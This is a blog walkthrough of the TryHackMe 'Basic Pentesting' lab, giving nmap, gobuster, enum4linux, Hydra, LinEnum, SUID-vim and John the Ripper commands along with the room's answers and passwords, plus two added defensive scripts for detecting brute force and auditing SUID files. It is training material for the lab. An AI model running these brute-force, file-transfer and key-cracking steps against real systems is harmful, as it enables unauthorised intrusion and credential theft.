Jasper Alblas
Mastering Data & Cybersec
Hi! It is time to look at the Basic Pentesting room on TryHackMe. In this CTF we practise web app hacking and privilege escalation.

In this set of tasks you’ll learn the following:
Credits to Josiah Pierce from Vulnhub.
Answer: No answer needed
This time I decided to use the following command:
nmap -sC -sV -oN nmap -p- <target ip>
Breakdown:
-sC: run the default script set against the open ports
-sV: probe the open ports for service and version information
-oN nmap: save the normal output to a file called nmap
-p-: scan all 65535 ports instead of the default top 1000
The open ports are:

We can see an SSH service, SMB and a web server, as well as AJP (Jserv) and Tomcat.
And the script results:

Answer: No answer needed
There is a web server running on port 80:

We can take a look at the source code:

Dev section…hmm. Let’s search for hidden directories by using dirbuster or gobuster. We will use gobuster here. We can use the following command:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>
We found a development page. Maybe this is the one referred to in the source code!
Answer: development
Let’s have a look at the page we found:

Interesting. We get to see the files in the directory. Let’s have a look at both:
dev.txt:

j.txt:

A bunch of info here. We learn about Apache and SMB, but more importantly the author of dev.txt mentions Apache Struts, which is a Java web application framework. In addition he mentions version 2.5.12 and that he used the REST version.
In the other file we get a hint about weak credentials found in the /etc/shadow file.
But we don’t have access to the system yet!
Remember back from the port scanning that we discovered SMB? Let’s enumerate that. We do this with the following command:
enum4linux <target ip>
This gives us a bunch of info on the SMB service:

We can see that anonymous access is possible using an empty username and an empty password. A bit further below we read the following lines:

Jan and Kay. Sure sounds like the users mentioned in j.txt. So we can pretty much conclude that Jan has a weak password.
Let’s try to brute-force Jan’s SSH password with Hydra! We can use the following command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target ip>
Let it run for a bit and you will find the answer:

Armando!
Answer: No answer needed
Answer: jan
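Both guessing steps in this walkthrough (gobuster guessing directory names, Hydra guessing Jan’s SSH password) leave the same footprint on the target: a burst of failures from one source address, then a success. The script below is an added example written for the defending side; it is not part of the original post or the room. It parses constructed sshd and Apache access-log lines (the samples, addresses, thresholds and window are all assumptions) with one shared sliding-window detector, raising an alert when a source crosses the failure threshold and a second, higher-severity alert when that same source then gets a hit.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format (as in /var/log/auth.log); not real data from the room.
SAMPLE_SSHD = """\
Jan 10 12:00:01 target sshd[1201]: Failed password for jan from 10.10.14.7 port 40110 ssh2
Jan 10 12:00:01 target sshd[1202]: Failed password for jan from 10.10.14.7 port 40112 ssh2
Jan 10 12:00:02 target sshd[1203]: Failed password for invalid user admin from 10.10.14.7 port 40114 ssh2
Jan 10 12:00:02 target sshd[1204]: Failed password for jan from 10.10.14.7 port 40116 ssh2
Jan 10 12:00:03 target sshd[1205]: Failed password for jan from 10.10.14.7 port 40118 ssh2
Jan 10 12:00:03 target sshd[1206]: Failed password for jan from 10.10.14.7 port 40120 ssh2
Jan 10 12:00:04 target sshd[1207]: Accepted password for jan from 10.10.14.7 port 40122 ssh2
Jan 10 12:05:00 target sshd[1300]: Failed password for kay from 192.0.2.9 port 51000 ssh2
Jan 10 12:30:00 target sshd[1400]: Accepted publickey for kay from 192.0.2.9 port 51010 ssh2
"""

# Constructed Apache combined-log lines for a directory brute force; also not real data.
SAMPLE_ACCESS = """\
10.10.14.7 - - [10/Jan/2024:12:00:01 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.7 - - [10/Jan/2024:12:00:01 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.7 - - [10/Jan/2024:12:00:02 +0000] "GET /dev HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.7 - - [10/Jan/2024:12:00:02 +0000] "GET /test HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.7 - - [10/Jan/2024:12:00:03 +0000] "GET /uploads HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.7 - - [10/Jan/2024:12:00:03 +0000] "GET /development/ HTTP/1.1" 200 512 "-" "gobuster/3.6"
192.0.2.9 - - [10/Jan/2024:12:00:10 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]\s]+)[^\]]*\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)


def sshd_event(line):
    """Turn one sshd line into (timestamp, source ip, 'fail'|'success', detail), or None."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    kind = "fail" if m["result"] == "Failed" else "success"
    return (ts, m["ip"], kind, f"ssh login as {m['user']}")


def apache_event(line):
    """Same shape for an access-log line: a 404 is a miss, any other status is a hit."""
    m = APACHE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S")
    kind = "fail" if m["status"] == "404" else "success"
    return (ts, m["ip"], kind, f"{m['req']} -> {m['status']}")


def burst_alerts(events, threshold, window_seconds):
    """One 'burst' alert per source once `threshold` failures fall inside the window,
    plus a 'success_after_burst' alert each time such a source then succeeds."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # source ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for ts, source, kind, detail in events:
        q = recent[source]
        while q and ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if kind == "fail":
            q.append(ts)
            if len(q) >= threshold and source not in flagged:
                flagged.add(source)
                alerts.append(("burst", source, f"{len(q)} failures within {window_seconds}s"))
        elif len(q) >= threshold:
            alerts.append(("success_after_burst", source, detail))
    return alerts


def scan_log(text, parser, threshold=5, window_seconds=60):
    events = [e for e in map(parser, text.splitlines()) if e]
    return burst_alerts(events, threshold, window_seconds)


if __name__ == "__main__":
    for name, text, parser in (("sshd", SAMPLE_SSHD, sshd_event), ("apache", SAMPLE_ACCESS, apache_event)):
        for alert in scan_log(text, parser):
            print(name, *alert)
```

On a real host you would feed it /var/log/auth.log and the web server’s access log and tune the threshold and window. Rate limiting on sshd (a low MaxAuthTries, or a ban tool such as fail2ban) and disabling password authentication for accounts that have keys would have stopped the Hydra run on this box long before rockyou.txt reached the right entry.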
BONUS:
We could also have figured this out by accessing the anonymous share through smbclient:

If we read this txt file:

See above to find the cracked password.
Answer: armando
We have seen a SSH service running.
Answer: SSH
We can now login with SSH. We can use the following command:
ssh jan@<ip>
Then write the password when prompted. We get access to jan’s home directory:

If we look a bit further we can get into Kay’s home directory as well:

We can see pass.bak, which is a backup of some kind. Maybe a password?
To escalate privileges we can use a tool such as LinEnum, which enumerates the system for possible privilege escalation vectors. We need to do the following:
1. Download LinEnum from here: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
You can copy the RAW text and enter it into a file called LinEnum.
2. Start up a simple Python web server from the directory of the new file:
python -m http.server 8000
3. Download the file from the target machine:
wget http://<attacker ip>:8000/LinEnum
4. Give yourself execute permission on the file:
chmod +x LinEnum
5. Run it!
Alternatively you can use scp to copy it over!
Read through the results. I will paste a few interesting tidbits here:

We can see that Kay is an admin.

We can read the passwd file, but not the shadow file.

Now this is interesting: vim.basic has the SUID bit set, meaning it runs with root privileges no matter who starts it. That means we can use vim to read the pass.bak file from earlier!

This is actually the answer to the final question!
We can now change user with the new password:

Answer: No answer needed
Answer: kay
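LinEnum surfaced the two weaknesses that carried this box: a set-uid vim.basic and a readable pass.bak in another user’s home. The script below is an added auditing example (mine, not LinEnum’s and not part of the original post) that checks a directory tree for exactly those two classes of problem: set-id binaries that are interactive tools, and credential-looking files in home directories that other users can read. The shortlist of shell-capable tools, the filename patterns and the demo tree it builds under a temporary directory are all constructed for the example.

```python
import os
import re
import stat
import tempfile

# Set-id programs that can open a shell or read arbitrary files when run as their
# owner (a constructed shortlist for the demo, not an exhaustive list).
SHELL_CAPABLE = {"vim", "vim.basic", "vi", "nano", "less", "more", "find",
                 "bash", "sh", "python3", "perl", "awk"}
# Filenames that usually hold credentials: backups, anything named *pass*, private keys.
SECRET_NAME = re.compile(r"(\.bak$|pass|^id_(rsa|dsa|ecdsa|ed25519)$|\.pem$)", re.I)


def classify_setid(path, mode):
    """Return (severity, message) for a set-id file, or None for a normal file."""
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    bit = "SUID" if mode & stat.S_ISUID else "SGID"
    if os.path.basename(path) in SHELL_CAPABLE:
        return ("HIGH", f"{bit} on interactive tool {path}: runs as its owner and can read any file or spawn a shell")
    return ("INFO", f"{bit} binary {path}: confirm it is expected (passwd, sudo, ...)")


def classify_home_file(path, mode):
    """Flag secret-looking files in a home directory that group or others can read."""
    if SECRET_NAME.search(os.path.basename(path)) and mode & (stat.S_IRGRP | stat.S_IROTH):
        return ("MEDIUM", f"{path} is readable by group/others (mode {stat.S_IMODE(mode):04o}); should be 0600")
    return None


def audit_tree(root, home_root):
    """Walk `root`; home-directory checks apply only to paths below `home_root`."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):  # skip symlinks, sockets, devices
                continue
            checks = [classify_setid(path, st.st_mode)]
            if path.startswith(home_root + os.sep):
                checks.append(classify_home_file(path, st.st_mode))
            findings.extend(f for f in checks if f)
    return findings


def build_demo_tree():
    """Construct a throwaway tree mirroring the room's findings (all paths are constructed)."""
    root = tempfile.mkdtemp(prefix="setid-audit-demo-")
    spec = {
        "usr/bin/vim.basic": 0o4755,        # the dangerous one from the walkthrough
        "usr/bin/passwd": 0o4755,           # a legitimately set-uid program
        "home/kay/pass.bak": 0o644,         # password backup readable by everyone
        "home/kay/.ssh/id_rsa": 0o644,      # private key readable by everyone
        "home/kay/.ssh/id_rsa.pub": 0o644,  # public key: fine to be readable
        "home/jan/notes.txt": 0o644,        # ordinary file, no finding expected
    }
    for rel, mode in spec.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("demo\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for severity, message in audit_tree(demo, os.path.join(demo, "home")):
        print(severity, message)
```

On the page’s box the fixes are `chmod u-s /usr/bin/vim.basic` and `chmod 600` on pass.bak and id_rsa (better still, not keeping a plaintext password backup at all). Run the audit from cron or configuration management against `/` with `/home` as the home root so a newly set-uid editor is noticed before anyone else finds it.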
If you have found another user, what can you do with this information?

Well, here’s the thing. I already answered the final question. But on a closer look we can find something interesting in Kay’s .ssh directory. There is a private key!
We can try logging in:
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa
Unfortunately we are missing a passphrase:

We can use John the Ripper to crack this, specifically its ssh2john script. It is located at the following path:

Let’s run the following command after saving the RSA key on your attacker machine:
/opt/john/ssh2john.py kay_id_rsa > john_hash.txt
Now we can run John:
john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
And we find the passphrase:

Now we can login:

And enter the passphrase beeswax.
This was another way in!
Answer: No answer needed
We found this earlier through the vulnerability in the vim executable.
Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy
Thanks for reading. Hopefully you found out that there are many ways to get root access 🙂
You can find my other walkthroughs here.
You are welcome to comment on this article and share my post with friends. I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: